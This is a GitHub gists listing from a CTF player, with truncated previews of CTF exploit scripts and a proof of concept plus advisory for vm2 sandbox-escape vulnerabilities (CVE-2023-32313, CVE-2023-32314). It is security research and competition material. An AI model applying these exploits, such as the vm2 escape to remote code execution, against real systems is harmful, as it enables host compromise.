Skip to content

Instantly share code, notes, and snippets.

View arkark's full-sized avatar
🔏
🚩

Takeshi Kaneko arkark

🔏
🚩
160 followers · 57 following
View GitHub Profile
@arkark
arkark / README.md
Last active August 29, 2023 13:55
intigriti / Challenge 0823 by huli
@arkark
arkark / solution.md
Last active July 31, 2023 19:27
corCTF 2023 - web/leakynote
@arkark
arkark / README.md
Last active July 26, 2023 07:44
Google CTF 2023 - web/Biohazard
@arkark
arkark / exploit.js
Last active June 12, 2023 03:44
SEETF 2023 - Web/Mandatory Notes Challenge
/*
SEETF 2023 - Web/Mandatory Notes Challenge - 4 solves / 496 points
* ctftime: https://ctftime.org/event/1828
Solution: XS-Leak with URL length limits in Google Chrome. I used a very long authority part to make the oracle.
*/
@arkark
arkark / test.js
Last active May 19, 2023 08:50
PoC for breaking console.log in [email protected] - CVE-2023-32313
const { VM } = require("vm2");
const vm = new VM();
const code = `
let proxiedInspect;
const source = new Proxy(() => {}, {
get: function (target, prop, receiver) {
if (prop === Symbol.for("nodejs.util.inspect.custom")) {
// https://github.com/nodejs/node/blob/v20.1.0/lib/internal/util/inspect.js#L805-L811
@arkark
arkark / vm2_3.9.17_sandbox_escape.md
Last active January 16, 2024 20:48
Sandbox Escape in [email protected] - CVE-2023-32314

Sandbox Escape in [email protected]

A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of Proxy, and allows RCE via Function in the host context.

Impact

A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

PoC

@arkark
arkark / exploit.py
Created April 27, 2023 16:12
ångstromCTF 2023 - web/filestore
# ångstromCTF 2023 - web/filestore
# Solution: just bruteforce for uniqid()
import httpx
import subprocess
from concurrent.futures import ThreadPoolExecutor
# BASE_URL = "http://localhost:3000"
BASE_URL = "https://filestore.web.actf.co"
@arkark
arkark / hook.js
Created March 12, 2023 16:37
hxp CTF 2022 - rev/required
/*
hxp CTF 2022 - rev/required
* https://ctftime.org/event/1845
My solution with JavaScript's Proxy:
1. Save this file as `hook.js`
2. Change the first line of `required.js` to:
@arkark
arkark / solve.py
Created October 2, 2022 16:45
SekaiCTF 2022 / PPC / Electric Box
RN = input()
rs = input()[:20]
LWM = input()
H, W, M = list(map(int, LWM.split(" ")))
obs = ""
for i in range(M):
obs += input() + "_"
obs = obs[:20]
@arkark
arkark / exploit.fish
Last active September 4, 2022 05:29
CakeCTF 2022 / Panda Memo
# CakeCTF 2022 ( https://ctftime.org/event/1683 )
# web / Panda Memo
set BASE_URL "http://localhost:3000"
set BASIC_USER guest
set BASIC_PASS guest
# set BASE_URL "http://web2.2022.cakectf.com:40767"
# set BASIC_USER guest
# set BASIC_PASS L4VBqmWQZP6S2P8.